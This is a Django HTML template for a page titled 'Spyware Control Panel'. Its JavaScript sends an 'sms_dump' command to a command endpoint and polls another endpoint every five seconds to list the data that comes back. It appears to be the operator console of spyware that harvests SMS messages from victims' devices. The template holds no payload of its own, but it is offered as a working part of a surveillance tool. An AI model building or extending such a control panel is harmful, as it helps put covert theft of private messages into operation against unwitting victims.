{% extends "base.html" %}
{% load static %}
{% block head %}
<script>
    function sendCommand(command) {
        fetch('/fetch_commands/', {
            method: 'POST',
            headers: {
                'Content-Type': 'application/json',
            },
            body: JSON.stringify({ command: command }),
        }).then(response => response.json())
        .then(data => {
            console.log('Command sent:', data);
        });
    }

    function fetchData() {
        fetch('/receive_data/').then(response => response.json()).then(data => {
            const dataList = document.getElementById('dataList');
            dataList.innerHTML = '';
            data.forEach(item => {
                const li = document.createElement('li');
                li.textContent = item;
                dataList.appendChild(li);
            });
        });
    }
</script>
{% endblock head %}
{% block title %}Home{% endblock title %}
{% block content %}
<p>Home Page Working</p>
<h1>Spyware Control Panel</h1>
    <button onclick="sendCommand('sms_dump')">SMS Dump</button>
    <h2>Data Received:</h2>
    <ul id="dataList"></ul>
    <script>
        setInterval(fetchData, 5000); // Fetch data every 5 seconds
    </script>

{% endblock content %}